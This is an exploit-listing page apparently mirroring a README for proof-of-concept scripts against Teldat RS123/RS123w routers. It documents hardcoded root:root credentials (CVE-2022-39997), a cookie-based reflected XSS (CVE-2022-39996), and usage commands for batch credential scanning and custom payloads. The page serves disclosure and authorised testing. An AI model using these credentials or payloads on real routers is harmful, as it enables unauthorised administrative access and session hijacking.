Exploit for Teldat-Router-CVE-2022-POC CVE-2022-39996 CVE-2022-39997

Name: Exploit for Teldat-Router-CVE-2022-POC CVE-2022-39996 CVE-2022-39997
Rating: 5 (7 reviews)
2026-06-09 | CVSS 8.0
## https://sploitus.com/exploit?id=DFA331A1-165E-5B25-855D-573E5EE30AE2
# Teldat Router CVE-2022-39996 & CVE-2022-39997 POC

> Proof of Concept for two vulnerabilities discovered in Teldat RS123 / RS123w routers.

## Overview

| CVE ID | Type | CWE | CVSS | Severity |
|--------|------|-----|------|----------|
| [CVE-2022-39996](#cve-2022-39996---reflected-xss) | Reflected XSS | CWE-79 | 6.1 | Medium |
| [CVE-2022-39997](#cve-2022-39997---weak-password) | Weak Password | CWE-521 | 9.8 | Critical |

**Affected Product:** Teldat RS123, RS123w Router

---

## CVE-2022-39997 - Weak Password

### Description

Teldat RS123/RS123w routers ship with hardcoded default credentials `root:root`. Administrators frequently leave these unchanged, allowing unauthenticated attackers to gain full administrative access via Telnet, SSH, HTTP, or other services.

### Proof

```
Account: root
Password: root
```

![Weak Password POC](https://user-images.githubusercontent.com/38815439/187359831-81c7aa38-9428-4b5a-8c6e-e91a300f263c.png)

### Usage

```bash
pip install requests paramiko

# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Batch scan
python CVE-2022-39997.py -f targets.txt
```

---

## CVE-2022-39996 - Reflected XSS

### Description

The `/upgrade/index.html` endpoint reflects the `cmd` HTTP cookie value in the response without sanitization. An attacker can craft a malicious request containing JavaScript in the `cmd` cookie. When an authenticated administrator visits the page, the script executes in the browser context of the router's web interface, enabling session hijacking or configuration manipulation.

### Proof

- Crafting XSS payload in the `cmd` cookie:

![XSS POC 1](https://user-images.githubusercontent.com/38815439/187361658-2b24b895-ab0c-47fd-b6fe-d569fa4d011d.png)

- XSS triggered in browser:

![XSS POC 2](https://user-images.githubusercontent.com/38815439/187362213-273af07e-9fdb-40fe-8d65-805ceef76072.png)

### Usage

```bash
pip install requests

# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "alert(document.cookie)"
```

---

## Files

| File | Description |
|------|-------------|
| `CVE-2022-39997.py` | Weak password detection (Telnet / SSH / HTTP / FTP) |
| `CVE-2022-39996.py` | Reflected XSS detection via `cmd` cookie |
| `Teldat's Router Vulnerability.md` | Full vulnerability disclosure report |

---

## Disclaimer

These POC scripts are for **educational and authorized security testing only**. Do not use against systems you do not own or have explicit permission to test. The author is not responsible for any misuse or damage.